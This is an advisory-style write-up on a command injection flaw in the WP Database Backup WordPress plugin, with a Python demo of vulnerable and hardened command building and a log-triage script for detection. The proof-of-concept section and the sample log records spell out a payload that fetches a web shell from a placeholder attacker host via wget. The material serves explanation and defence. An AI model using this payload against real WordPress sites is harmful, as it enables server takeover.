Introduction
Attackers leveraged a critical flaw in the WP Database Backup plugin for WordPress to gain remote code execution on thousands of websites. This vulnerability, tracked as CVE-2019-25224, allowed unauthenticated users to execute arbitrary commands on the hosting server, leading to full site compromise and persistent access. With over 70,000 active installations at the time, the impact was widespread across the WordPress ecosystem.
About WP Database Backup: WP Database Backup is a widely used WordPress plugin developed by WP Seeds, designed to simplify database backup and restoration for site administrators. Its popularity stems from ease of use and automation features, but recurring security issues have affected its reputation in the WordPress community.
Technical Information
CVE-2019-25224 is an OS command injection vulnerability in WP Database Backup plugin versions up to and including 5.1.2. The root cause is unsanitized handling of the wp_db_exclude_table parameter, which the plugin inserts directly into the mysqldump command line it builds for database backups. Because the value is neither validated against real table names nor escaped for the shell, a value containing shell metacharacters, such as a $(...) command substitution, is interpreted by the shell when the backup command runs, so the attacker's text is executed as a command rather than treated as a table name.
The vulnerable code path is reached whenever a backup is started, either manually by an administrator or by a scheduled task. Because the plugin did not implement proper authorization checks on the settings that feed this parameter, unauthenticated attackers could exploit the flaw remotely. The injected commands run with the privileges of the web server user, which gives the attacker control of everything that user can read or write, including the WordPress files and configuration, and frequently leads to full compromise of the host.
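The following Python example is added here to make the mechanism concrete. It is not the plugin's code (which is PHP) but a stand-in that builds the backup command line in the two ways that matter: the vulnerable function interpolates the raw request value into a shell string, the same class of flaw described above, while the hardened function allow-lists each table name and passes it as its own argv element with no shell involved. The database name, the use of echo in place of the real mysqldump binary (so the example runs without MySQL and simply prints the command the shell received), and the comma-separated format of the exclude list are assumptions made for the demonstration. The PHP counterpart of the hardened path is to validate the names and pass each one through escapeshellarg() before the exec() string is assembled.

```python
import re
import subprocess

DB_NAME = "wordpress"  # assumed database name for the demonstration
DUMP_BIN = "echo"      # stand-in for the mysqldump binary so this runs without MySQL
TABLE_NAME = re.compile(r"^[A-Za-z0-9_]+$")  # allow-list: plain identifiers only


def vulnerable_backup(exclude_tables):
    """Mimics the flawed pattern: the raw request value is interpolated into a
    shell command string, so anything the shell treats specially is honoured."""
    ignore_args = " ".join(
        f"--ignore-table={DB_NAME}.{t}" for t in exclude_tables.split(",") if t
    )
    cmd = f"{DUMP_BIN} {DB_NAME} {ignore_args}"
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True, check=True).stdout


def unvalidated_argv_backup(exclude_tables):
    """No validation, but also no shell: each value is one argv element, so a
    $(...) payload reaches the dump tool as literal text, not as a command."""
    argv = [DUMP_BIN, DB_NAME]
    argv += [f"--ignore-table={DB_NAME}.{t}" for t in exclude_tables.split(",") if t]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def validate_table_names(exclude_tables):
    """Allow-list check: every requested table must look like an identifier.
    Raises on anything else, so shell metacharacters never reach a command."""
    names = [t for t in exclude_tables.split(",") if t]
    bad = [t for t in names if not TABLE_NAME.match(t)]
    if bad:
        raise ValueError(f"rejected exclude-table value(s): {bad!r}")
    return names


def accepts(exclude_tables):
    """True if the value passes the allow-list, False if it would be rejected."""
    try:
        validate_table_names(exclude_tables)
        return True
    except ValueError:
        return False


def hardened_backup(exclude_tables):
    """Both layers together: validated names, passed as argv with no shell."""
    argv = [DUMP_BIN, DB_NAME]
    argv += [f"--ignore-table={DB_NAME}.{t}" for t in validate_table_names(exclude_tables)]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Constructed payload in the shape the advisory describes; it only echoes a marker.
    payload = "wp_options,$(echo INJECTED)"
    print("vulnerable (shell string):", vulnerable_backup(payload).strip())
    print("argv without shell:       ", unvalidated_argv_backup(payload).strip())
    print("allow-list accepts payload:", accepts(payload))
    print("hardened, benign input:    ", hardened_backup("wp_options,wp_posts").strip())
```

Running it shows the shell-string variant printing INJECTED where the table name should be, because the shell performed the substitution before the dump tool ever ran; the argv variant prints the payload verbatim, and the allow-list rejects it outright. Both layers are worth keeping: the argv form stops the shell from interpreting the value, and the allow-list stops a syntactically odd table name from reaching mysqldump at all.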
Proof of Concept
The WP Database Backup plugin for WordPress, up to and including version 5.1.2, allows unauthenticated attackers to execute arbitrary commands on the host server. The plugin builds a mysqldump command to perform database backups and incorporates the wp_db_exclude_table parameter, which lists the database tables to exclude from the backup, into that command without sanitization. An attacker can therefore place shell commands in the wp_db_exclude_table value, and they run each time a backup is initiated, whether manually or through a scheduled task.
To exploit this vulnerability, an attacker sends a specially crafted POST request to the wp-database-backup page, setting the wp_db_exclude_table parameter to a payload that executes arbitrary commands. For example, a value such as $(wget http://malicious-site.com/shell.txt -O shell.php) would, when the backup runs, download a script and save it as shell.php on the server, from which the attacker could extend control over the host. Because the injected value is reused by every later backup, the command runs again whenever a backup is started, which gives the attacker persistence without further requests.
It's important to note that while the initial discovery suggested that authentication was required to exploit this vulnerability, further analysis revealed that unauthenticated attackers could also exploit it due to the lack of proper authorization checks in the plugin's code. This significantly increases the risk, as any remote attacker can exploit the vulnerability without needing valid credentials.
This vulnerability was publicly disclosed on April 24, 2019, and has been assigned a CVSS score of 10.0, indicating its critical severity. Users of the WP Database Backup plugin are strongly advised to update to version 5.2 or later, where this issue has been patched.
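As an added example for the detection side, not part of the original advisory or of any vendor code, the following Python triage function runs over request records and flags any wp_db_exclude_table value that could not be a plain table name, in both the query string and the POST body. The request records are constructed for the example, the admin URL path is an assumption about how the plugin's settings page is reached, and a real deployment would feed the function from a WAF or reverse-proxy log that captures POST bodies, which default web server access logs do not.

```python
import re
from urllib.parse import parse_qs, urlsplit

PARAM = "wp_db_exclude_table"
TABLE_NAME = re.compile(r"^[A-Za-z0-9_]+$")      # what a legitimate table name looks like
SHELL_META = re.compile(r"[$`;|&<>()\n]")        # characters a shell would act on

# Constructed sample records (method, URL, urlencoded body, client IP); not real traffic.
# The admin.php?page=... path is an assumption about the plugin's settings page.
SAMPLE_REQUESTS = [
    ("POST", "/wp-admin/admin.php?page=wp-database-backup",
     "wp_db_exclude_table=wp_options%2Cwp_posts", "10.0.0.5"),
    ("POST", "/wp-admin/admin.php?page=wp-database-backup",
     "wp_db_exclude_table=%24%28wget+http%3A%2F%2Fmalicious-site.com%2Fshell.txt+-O+shell.php%29",
     "203.0.113.7"),
    ("GET", "/?page=wp-database-backup&wp_db_exclude_table=wp_users%3Bid", "", "198.51.100.9"),
    ("POST", "/wp-login.php", "log=admin&pwd=secret", "10.0.0.6"),
]


def extract_exclude_values(url, body):
    """Collect every wp_db_exclude_table value from the query string and the body."""
    values = []
    for qs in (urlsplit(url).query, body):
        values += parse_qs(qs, keep_blank_values=True).get(PARAM, [])
    return values


def suspicious_tables(value):
    """Return the comma-separated entries that are not plain identifiers."""
    return [t for t in value.split(",") if not TABLE_NAME.match(t)]


def triage(requests):
    """One finding per request value that carries something other than table names."""
    findings = []
    for method, url, body, ip in requests:
        for value in extract_exclude_values(url, body):
            bad = suspicious_tables(value)
            if bad:
                findings.append({
                    "ip": ip,
                    "method": method,
                    "url": url,
                    "bad_entries": bad,
                    "shell_meta": bool(SHELL_META.search(value)),
                })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        print(finding)
```

The identifier allow-list, rather than a blocklist of known payloads, is the deciding check: a legitimate exclude list never needs anything beyond letters, digits and underscores, so anything else is worth a look regardless of which metacharacters it uses. The shell_meta flag is only there to prioritise the hits that are plainly command injection attempts over ones that might be a malformed but harmless value.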
References for PoC:
- https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-database-backup/wp-database-backup-52-os-command-injection
Patch Information
The developers of WP Database Backup addressed the vulnerability in version 5.2 by adding authorization checks to the code that handles the backup settings, so that only users with the appropriate capability can reach it. Capability checks restrict who can submit a value for wp_db_exclude_table; they do not by themselves change what the plugin does with that value. Because the root cause is a table name inserted unsanitized into the mysqldump command line, a complete fix also has to validate the names (for example, against the tables that actually exist in the database, or against an identifier pattern) or pass each one through escapeshellarg() before it reaches the shell, so that an administrator account, or a compromised one, cannot use the same injection. When auditing a site, confirm both that the plugin is at 5.2 or later and that no stored exclude-table value contains shell metacharacters from an earlier compromise, since a stored payload keeps running on every scheduled backup until it is removed.
Patch sources:
Affected Systems and Versions
- Product: WP Database Backup plugin for WordPress
- Affected versions: Up to and including 5.1.2
- Fixed in: Version 5.2
- Vulnerable configurations: Any WordPress installation with the WP Database Backup plugin at version 5.1.2 or below
Vendor Security History
WP Seeds, the developer of WP Database Backup, has a history of multiple vulnerabilities in this plugin, including cross-site scripting and information disclosure. Patch response time for this vulnerability was relatively fast, but recurring issues indicate a need for improved security practices.